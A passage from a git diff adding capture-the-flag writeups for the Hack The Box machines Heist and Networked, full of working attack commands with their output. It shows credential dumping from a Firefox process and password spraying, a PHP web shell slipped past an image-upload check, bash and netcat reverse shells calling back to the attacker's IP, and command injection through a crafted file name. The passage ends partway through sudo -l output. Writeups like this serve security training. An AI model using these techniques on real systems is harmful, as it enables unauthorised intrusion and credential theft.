+ ERROR: While executing gem ... (Gem::FilePermissionError)
+ You don't have write permissions for the /var/lib/gems/2.5.0 directory.
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → sudo !! [e501272]
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → sudo gem install winrm winrm-fs stringio [e501272]
+ [sudo] password for nihilist:
+
+
+Once that's done, run the ruby script as follows:
+
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149 [e501272]
+
+ Evil-WinRM shell v2.3
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\Chase\Documents>
+
+
+And we are logged in as the Chase user!
+
+
+ *Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
+ *Evil-WinRM* PS C:\Users\Chase> gci -recurse . | select fullname
+
+ FullName
+ --------
+ C:\Users\Chase\3D Objects
+ C:\Users\Chase\Contacts
+ C:\Users\Chase\Desktop
+ C:\Users\Chase\Documents
+ C:\Users\Chase\Downloads
+ C:\Users\Chase\Favorites
+ C:\Users\Chase\Links
+ C:\Users\Chase\Music
+ C:\Users\Chase\Pictures
+ C:\Users\Chase\Saved Games
+ C:\Users\Chase\Searches
+ C:\Users\Chase\Videos
+ C:\Users\Chase\Desktop\todo.txt
+ C:\Users\Chase\Desktop\user.txt
+ C:\Users\Chase\Favorites\Links
+ C:\Users\Chase\Favorites\Bing.url
+ C:\Users\Chase\Links\Desktop.lnk
+ C:\Users\Chase\Links\Downloads.lnk
+
+ *Evil-WinRM* PS C:\Users\Chase> type Desktop\user.txt
+ a1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+and that's it ! we have been able to print out the user flag :)
+
+## **Part 3 : Getting Root Access**
+
+In order to privesc, let's check out the files we can view beforehand.
+
+
+ *Evil-WinRM* PS C:\Users\Chase> cd Desktop
+ *Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
+ Stuff to-do:
+ 1. Keep checking the issues list.
+ 2. Fix the router config.
+
+ Done:
+ 1. Restricted access for guest user.
+
+
+looks like they had to fix the router config, as we saw earlier in the issues.php webpage on the http service running on port 80.
+
+
+ *Evil-WinRM* PS C:\Users> cd Hazard
+ *Evil-WinRM* PS C:\Users\Hazard> dir
+ Access to the path 'C:\Users\Hazard' is denied.
+ At line:1 char:1
+ + dir
+ + ~~~
+ + CategoryInfo : PermissionDenied: (C:\Users\Hazard:String) [Get-ChildItem], UnauthorizedAccessException
+ + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+
+
+checking out hazard's user directory, we get permissions denied. We know there is a webserver, so let's enumerate it.
+
+
+ *Evil-WinRM* PS C:\> cd inetpub
+ *Evil-WinRM* PS C:\inetpub> cd wwwroot
+ *Evil-WinRM* PS C:\inetpub\wwwroot> dir
+ Access to the path 'C:\inetpub\wwwroot' is denied.
+ At line:1 char:1
+ + dir
+ + ~~~
+ + CategoryInfo : PermissionDenied: (C:\inetpub\wwwroot:String) [Get-ChildItem], UnauthorizedAccessException
+ + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+ *Evil-WinRM* PS C:\inetpub\wwwroot>
+
+
+Weird, we don't have permissions to see what files are there in the wwwroot directory, although we know for a fact that index.php, login.php ,issues.php are there. Let's check out the most interesting one : login.php
+
+
+ session_start();
+ if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {
+ if( $_REQUEST['login_username'] === 'admin@support.htb' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
+ $_SESSION['admin'] = "valid";
+ header('Location: issues.php');
+ }
+ else
+ header('Location: errorpage.php');
+ }
+ else if( isset($_GET['guest']) ) {
+ if( $_GET['guest'] === 'true' ) {
+ $_SESSION['guest'] = "valid";
+ header('Location: issues.php');
+ }
+ }
+
+
+Looking at the results, we see a few interesting information : admin@support.htb, and a hash sha256 91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040. So navigating over to [hashes.org](hashes.org/search.php) we paste our hash and see that sadly, hashes.org can't find it for us, so we navigate over to the attachments directory
+
+
+ *Evil-WinRM* PS C:\inetpub\wwwroot> cd attachments
+ *Evil-WinRM* PS C:\inetpub\wwwroot\attachments> gci
+
+
+ Directory: C:\inetpub\wwwroot\attachments
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 4/21/2019 1:02 PM 780 config.txt
+
+
+this is the config.txt we found earlier, but since we don't have the writing rights to put our reverse shell in here, let's try to enumerate the machine a little further.
+
+
+ *Evil-WinRM* PS C:\inetpub\wwwroot\attachments> cd /
+ *Evil-WinRM* PS C:\> gci
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 4/21/2019 5:33 PM inetpub
+ d----- 9/15/2018 12:49 PM PerfLogs
+ d-r--- 8/27/2019 3:00 PM Program Files
+ d----- 4/22/2019 6:56 AM Program Files (x86)
+ d-r--- 4/22/2019 7:26 AM Users
+ d----- 8/27/2019 3:01 PM Windows
+
+
+ *Evil-WinRM* PS C:\> cd "Program Files"
+ *Evil-WinRM* PS C:\Program Files> gci
+
+
+ Directory: C:\Program Files
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 4/21/2019 9:39 AM Common Files
+ d----- 4/21/2019 11:00 AM internet explorer
+ d----- 4/22/2019 6:56 AM Mozilla Firefox
+ d----- 4/22/2019 6:47 AM PHP
+ d----- 4/22/2019 6:46 AM Reference Assemblies
+ d----- 4/22/2019 6:46 AM runphp
+ d----- 8/27/2019 3:00 PM VMware
+ d-r--- 4/21/2019 11:00 AM Windows Defender
+ d----- 4/21/2019 11:00 AM Windows Defender Advanced Threat Protection
+ d----- 9/15/2018 12:49 PM Windows Mail
+ d----- 4/21/2019 11:00 AM Windows Media Player
+ d----- 9/15/2018 12:49 PM Windows Multimedia Platform
+ d----- 9/15/2018 12:58 PM windows nt
+ d----- 4/21/2019 11:00 AM Windows Photo Viewer
+ d----- 9/15/2018 12:49 PM Windows Portable Devices
+ d----- 9/15/2018 12:49 PM Windows Security
+ d----- 9/15/2018 12:49 PM WindowsPowerShell
+
+
+We see that Firefox is installed, let's see if firefox is running using Get-Process
+
+
+ *Evil-WinRM* PS C:\Program Files> Get-Process
+
+ Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
+ ------- ------ ----- ----- ------ -- -- -----------
+ 445 17 2268 5632 416 0 csrss
+ 293 17 2288 5216 500 1 csrss
+ 358 15 3488 14520 5244 1 ctfmon
+ 257 14 4144 13504 3988 0 dllhost
+ 166 9 1880 9812 0.61 6596 1 dllhost
+ 619 32 33752 59888 372 1 dwm
+ 1491 58 23660 78168 5624 1 explorer
+ 1129 69 118928 157936 28.55 2204 1 firefox
+ 343 20 9980 37448 0.50 6272 1 firefox
+ 408 31 16888 62536 1.34 6516 1 firefox
+ 390 30 30596 64112 42.83 6860 1 firefox
+ 358 26 16348 37612 0.69 7020 1 firefox
+
+
+From there, we need to processdump one of the firefox processes, to do so we'll use sysinternals
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → wget https://download.sysinternals.com/files/SysinternalsSuite.zip
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → mv ~/Downloads/SysinternalsSuite.zip .
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → unzip SysinternalsSuite.zip
+
+
+_Terminal 1:_
+
+
+ *Evil-WinRM* PS C:\Program Files> cd \users\chase\Documents
+ *Evil-WinRM* PS C:\users\chase\Documents> upload /home/nihilist/_HTB/Heist/procdump64.exe
+ Info: Uploading /home/nihilist/_HTB/Heist/procdump64.exe to C:\users\chase\Documents\procdump64.exe
+
+ Data: 455560 bytes of 455560 bytes copied
+
+ Info: Upload successful!
+
+
+once it's uploaded, we can basically dump the firefox process we mentionned earlier. we'll set a few flags to run the binary we uploaded : -accepteula (self explanatory) -ma (write a full dump file)
+
+
+ *Evil-WinRM* PS C:\users\chase\Documents> .\procdump64.exe -accepteula -ma 2204
+
+ ProcDump v9.0 - Sysinternals process dump utility
+ Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
+ Sysinternals - www.sysinternals.com
+
+ [15:30:36] Dump 1 initiated: C:\users\chase\Documents\firefox.exe_200218_153036.dmp
+ [15:30:36] Dump 1 writing: Estimated dump file size is 460 MB.
+ [15:30:38] Dump 1 complete: 460 MB written in 1.8 seconds
+ [15:30:38] Dump count reached.
+
+
+Be aware that the accepteula flag creates a registry entry, which is basically forensic artifact on the box. looking at the results :
+
+
+ Evil-WinRM* PS C:\users\chase\Documents> gci
+
+
+ Directory: C:\users\chase\Documents
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 2/18/2020 3:30 PM 470485425 firefox.exe_200218_153036.dmp
+ -a---- 2/18/2020 3:26 PM 341672 procdump64.exe
+
+
+
+We're getting a massive file so let's download it rather than printing it's contents in the reverse shell,
+
+_Terminal 1:_
+
+
+ *Evil-WinRM* PS C:\users\chase\Documents> download firefox.exe_200218_153036.dmp
+ Info: Downloading C:\users\chase\Documents\firefox.exe_200218_153036.dmp to firefox.exe_200218_153036.dmp
+
+
+We're downloading a massive file and it takes forever, so let's print out the contents of the .dmp file locally looking for passwords
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ?
+ → strings firefox.exe_200218_153036.dmp | grep pass [e501272]
+ "C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login;_password=4dD!5}x/re8]FBuZ&login;=
+ MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login;_password=4dD!5}x/re8]FBuZ&login;=
+ localhost/login.php?login_username=admin@support.htb&login;_password=4dD!5}x/re8]FBuZ&login;=
+ MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login;_password=4dD!5}x/re8]FBuZ&login;=
+ x:///chrome/toolkit/content/passwordmgr/
+ x:///chrome/en-US/locale/en-US/passwordmgr/
+
+
+Here we see that a certain password shows up : 4dD!5}x/re8]FBuZ for the user admin@support.htb
+
+
+
+Although it offers no progress whatsoever to log in as that user on the webservice so let's try our credentials somewhere else. let's update our users.txt
+
+
+ secret
+ admin
+ rout3r
+ support
+ chase
+ jason
+ administrator
+
+
+let's update our pass.txt
+
+
+ 4dD!5}x/re8]FBuZ
+
+
+With our updated users.txt, let's run crackmapexec once again with the password we just found.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares
+ SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\support:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\chase:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\jason:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
+ SMB 10.10.10.149 445 SUPPORTDESK [+] Enumerated shares
+ SMB 10.10.10.149 445 SUPPORTDESK Share Permissions Remark
+ SMB 10.10.10.149 445 SUPPORTDESK ----- ----------- ------
+ SMB 10.10.10.149 445 SUPPORTDESK ADMIN$ READ,WRITE Remote Admin
+ SMB 10.10.10.149 445 SUPPORTDESK C$ READ,WRITE Default share
+ SMB 10.10.10.149 445 SUPPORTDESK IPC$ READ Remote IPC
+
+
+and we get matching credentials ! administrator:4dD!5}x/re8]FBuZ let's test out our freshly acquired credentials.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → python3 psexec.py administrator@10.10.10.149
+ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
+
+ Password:
+ [*] Requesting shares on 10.10.10.149.....
+ [*] Found writable share ADMIN$
+ [*] Uploading file REyCZIUo.exe
+ [*] Opening SVCManager on 10.10.10.149.....
+ [*] Creating service BCMq on 10.10.10.149.....
+ [*] Starting service BCMq.....
+ [!] Press help for extra shell commands
+ Microsoft Windows [Version 10.0.17763.437]
+ (c) 2018 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>type \users\administrator\desktop\root.txt
+ 50XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/37.md b/Easy/37.md
new file mode 100644
index 0000000..9bb8c9e
--- /dev/null
+++ b/Easy/37.md
@@ -0,0 +1,472 @@
+# Writeup
+
+
+
+## Networked Introduction :
+
+Networked is an easy Linux box that was released back in August 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → nmap -F 10.10.10.146
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:28 GMT
+ Nmap scan report for 10.10.10.146
+ Host is up (0.099s latency).
+ Not shown: 97 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 443/tcp closed https
+
+ Nmap done: 1 IP address (1 host up) scanned in 2.67 seconds
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Networked]
+ → nmap -sCV -p22,80 10.10.10.146
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:28 GMT
+ Nmap scan report for 10.10.10.146
+ Host is up (0.098s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
+ | 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
+ |_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
+ 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
+ |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
+ |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Let's investigate the webservice running on port 80 using the curl command with the -sk flags.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → curl -sk http://10.10.10.146
+ <****html> <****body>
+ Hello mate, we're building the new FaceMash! <****/br>
+ Help by funding us and be the new Tyler &Cameron;!<****/br>
+ Join us at the pool party this Sat to get a glimpse
+ <****/body> <****/html>
+
+Not much to see on the index page, so let's launch dirsearch to enumerate what directories we can find on the box.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Networked]
+ → dirsearch -u http://10.10.10.146/ -e txt,html,js,php -t 50
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, js, php | HTTP method: get | Threads: 50 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-18_10-32-21.log
+
+ Target: http://10.10.10.146/
+
+ [10:32:21] Starting:
+ [10:32:24] 403 - 213B - /.ht_wsr.txt
+ [10:32:24] 403 - 215B - /.htaccess-dev
+ [10:32:24] 403 - 217B - /.htaccess-local
+ [10:32:24] 403 - 206B - /.hta
+ [10:32:24] 403 - 217B - /.htaccess-marco
+ [10:32:24] 403 - 215B - /.htaccess.BAK
+ [10:32:24] 403 - 216B - /.htaccess.bak1
+ [10:32:24] 403 - 216B - /.htaccess.orig
+ [10:32:24] 403 - 215B - /.htaccess.old
+ [10:32:24] 403 - 216B - /.htaccess.save
+ [10:32:24] 403 - 218B - /.htaccess.sample
+ [10:32:24] 403 - 215B - /.htaccess.txt
+ [10:32:24] 403 - 217B - /.htaccess_extra
+ [10:32:24] 403 - 216B - /.htaccess_orig
+ [10:32:24] 403 - 214B - /.htaccess_sc
+ [10:32:24] 403 - 214B - /.htaccessBAK
+ [10:32:24] 403 - 214B - /.htaccessOLD
+ [10:32:24] 403 - 215B - /.htaccessOLD2
+ [10:32:24] 403 - 212B - /.htaccess~
+ [10:32:24] 403 - 210B - /.htgroup
+ [10:32:24] 403 - 215B - /.htpasswd-old
+ [10:32:24] 403 - 216B - /.htpasswd_test
+ [10:32:24] 403 - 212B - /.htpasswds
+ [10:32:24] 403 - 210B - /.htusers
+ [10:32:34] 301 - 235B - /backup -> http://10.10.10.146/backup/
+ [10:32:34] 200 - 885B - /backup/
+ [10:32:35] 403 - 210B - /cgi-bin/
+ [10:32:39] 200 - 229B - /index.php
+ [10:32:39] 200 - 229B - /index.php/login/
+ [10:32:48] 200 - 169B - /upload.php
+ [10:32:48] 301 - 236B - /uploads -> http://10.10.10.146/uploads/
+ [10:32:48] 200 - 2B - /uploads/
+
+
+here we have a few interesting results : /backup , /upload.php and /uploads/ , Let's move over to /upload.php and upload our nihilist.php which will basically grab the html GET Variable "nihilist" and pass it to the system command which will execute it.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Networked]
+ → nano nihilist.py
+
+
+
+ <****?php system($_GET['nihilist']); ?>
+
+
+
+Uploading the php file we get an error message "invalid image file". Earlier on our dirsearch scan found the /backup/ directory so navigating there we see a file named backup.tar ready for us to download, so let's do so using wget.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → wget http://10.10.10.146/backup/backup.tar && exiftool backup.tar
+ --2020-02-18 10:47:23-- http://10.10.10.146/backup/backup.tar
+ Connecting to 10.10.10.146:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 10240 (10K) [application/x-tar]
+ Saving to: ‘backup.tar’
+
+ backup.tar 100%[==================>] 10.00K --.-KB/s in 0.004s
+
+ 2020-02-18 10:47:23 (2.26 MB/s) - ‘backup.tar’ saved [10240/10240]
+
+ ExifTool Version Number : 11.86
+ File Name : backup.tar
+ Directory : .
+ File Size : 10 kB
+ File Modification Date/Time : 2019:07:09 12:33:42+01:00
+ File Access Date/Time : 2020:02:18 10:47:23+00:00
+ File Inode Change Date/Time : 2020:02:18 10:47:23+00:00
+ File Permissions : rw-r--r--
+ File Type : TAR
+ File Type Extension : tar
+ MIME Type : application/x-tar
+ Warning : Unsupported file type
+
+
+so we get a regular tar file, let's just extract it with tar -xvf
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → tar -xvf backup.tar
+ index.php
+ lib.php
+ photos.php
+ upload.php
+
+
+so we get a bunch of php files , now we are trying to see in what ways a user can interact with the server, so we'll use the following grep command and look at it's results
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → grep -Ri '$_' *
+
+ Binary file backup.tar matches
+ nihilist.php:
+ lib.php:<****form action=" " method="post" enctype="multipart/form-data">
+ photos.php: if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {
+ upload.php:if( isset($_POST['submit']) ) {
+ upload.php: if (!empty($_FILES["myFile"])) {
+ upload.php: $myFile = $_FILES["myFile"];
+ upload.php: if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
+ upload.php: //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
+ upload.php: $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → cat upload.php| grep type
+ if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
+
+
+Looking at the results, we see a few interesting variables , most notably the $_FILES global variable. we can also see that we must not upload a file that is too large, AND (&&) we need to make sure the check_file_type function allows us to proceed. so let's run the grep command again, this time looking for the check_file_type function :
+
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → grep -Ri 'check_file_type(' *
+ Binary file backup.tar matches
+ lib.php:function check_file_type($file) {
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → nano lib.php
+
+
+Looking at the results, we see it's being used in both upload.php and lib.php
+
+
+ function check_file_type($file) {
+ $mime_type = file_mime_type($file);
+ if (strpos($mime_type, 'image/') === 0) {
+ return true;
+ } else {
+ return false;
+ }
+ }
+
+
+looking at the function, we see that the file_mime_type function basically checks for [magic bytes](https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/) at the beginning of the uploaded file and seeing if it is actually an image. To test this , we can try and create our own false images :
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → echo "GIF8;nihilist" > test.txt
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → file test.txt
+ test.txt: GIF image data 26723 x 2608
+
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → nano nihilist.php
+
+
+
+ GIF8;
+
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → mv nihilist.php nihilist.php.gif
+
+
+next up we upload it, and browse to it
+
+  
+
+and from there, we can basically have command execution for example :
+
+
+ http://10.10.10.146/uploads/10_10_14_7.php.gif?nihilist=cat%20/etc/passwd
+
+ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin guly:x:1000:1000:guly:/home/guly:/bin/bash saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin
+
+ http://10.10.10.146/uploads/10_10_14_7.php.gif?nihilist=uname%20-a
+
+ GIF8;Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+
+
+ http://10.10.10.146/uploads/10_10_14_7.php.gif?nihilist=bash -i >& /dev/tcp/10.10.14.7/9001 0>&1
+
+
+Here we see that the previous URL does not work because we need to URL ENCODE the spaces, and & symbols, the spaces are + and the & are %26
+
+
+
+ http://10.10.10.146/uploads/10_10_14_7.php.gif?nihilist=bash+-i+>%26+/dev/tcp/10.10.14.7/9001+0>%261
+
+
+and we are catching the incoming reverse shell connection on our port 9001 :
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Networked]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.7] from (UNKNOWN) [10.10.10.146] 56620
+ bash: no job control in this shell
+ bash-4.2$ uname -a
+ uname -a
+ Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+ bash-4.2$ cd /home/guly
+ cd /home/guly
+ bash-4.2$ ls -la
+ ls -la
+ total 28
+ drwxr-xr-x. 2 guly guly 159 Jul 9 2019 .
+ drwxr-xr-x. 3 root root 18 Jul 2 2019 ..
+ lrwxrwxrwx. 1 root root 9 Jul 2 2019 .bash_history -> /dev/null
+ -rw-r--r--. 1 guly guly 18 Oct 30 2018 .bash_logout
+ -rw-r--r--. 1 guly guly 193 Oct 30 2018 .bash_profile
+ -rw-r--r--. 1 guly guly 231 Oct 30 2018 .bashrc
+ -rw------- 1 guly guly 639 Jul 9 2019 .viminfo
+ -r--r--r--. 1 root root 782 Oct 30 2018 check_attack.php
+ -rw-r--r-- 1 root root 44 Oct 30 2018 crontab.guly
+ -r--------. 1 guly guly 33 Oct 30 2018 user.txt
+
+ bash-4.2$ uname -a
+ uname -a
+ Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+ bash-4.2$ whoami
+ whoami
+ apache
+
+
+
+But we are not yet able to print the user flag, because we do not have enough permissions. we are currently the user apache, so we need to escalate privlieges to the guly user.
+
+
+ bash-4.2$ cat check_attack.php
+ cat check_attack.php
+ $value) {
+ $msg='';
+ if ($value == 'index.html') {
+ continue;
+ }
+ #echo "-------------\n";
+
+ #print "check: $value\n";
+ list ($name,$ext) = getnameCheck($value);
+ $check = check_ip($name,$value);
+
+ if (!($check[0])) {
+ echo "attack!\n";
+ # todo: attach file
+ file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
+
+ exec("rm -f $logpath");
+ exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
+ echo "rm -f $path$value\n";
+ mail($to, $msg, $msg, $headers, "-F$value");
+ }
+ }
+
+ ?>
+
+
+so here we have the php sourcecode of check_attack.php, and you can see that it has a dangerous function here exec("") which is like the system() function we used earlier, it can basically execute anything. So let's look at a line in particular :
+
+
+ exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
+
+
+here we can see that we have no control over anything in this line EXCEPT for the $value variable, which is basically the name of the file, let's navigate over to /var/www/html/uploads/
+
+
+ bash-4.2$ cd /var/www/html/uploads
+ cd /var/www/html/uploads
+
+ bash-4.2$ nc -v
+ nc -v
+ Ncat: Version 7.50 ( https://nmap.org/ncat )
+ Ncat: You must specify a host to connect to. QUITTING
+
+
+From there, we see that netcat is available for us.
+
+_Terminal 1:_
+
+
+ bash-4.2$ touch -- ';nc -c bash 10.10.14.7 9002;.php'
+ touch -- ';nc -c bash 10.10.14.7 9002;.php'
+ bash-4.2$ ls
+ ls
+ 10_10_14_7.php.gif 127_0_0_2.png 127_0_0_4.png index.html
+ 127_0_0_1.png 127_0_0_3.png ;nc -c bash 10.10.14.7 9002;.php
+
+
+here we see that we have the filename we want, which will replace our previous $value and seamlessly give us another reverse shell. we ready our other terminal.
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.7] from (UNKNOWN) [10.10.10.146] 50702
+ uname -a
+ Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ [guly@networked ~]$
+
+
+and now we have upgraded our reverse shell to a tty using python's pty.spawn() function
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.7] from (UNKNOWN) [10.10.10.146] 50708
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ [guly@networked ~]$ cat /home/guly/user.txt
+ cat /home/guly/user.txt
+ 52XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to privesc on a linux machine, a good reflex to have is to try out the sudo -l command
+
+
+ [guly@networked ~]$ sudo -l
+ sudo -l
+ Matching Defaults entries for guly on networked:
+ !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
+ env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
+ env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
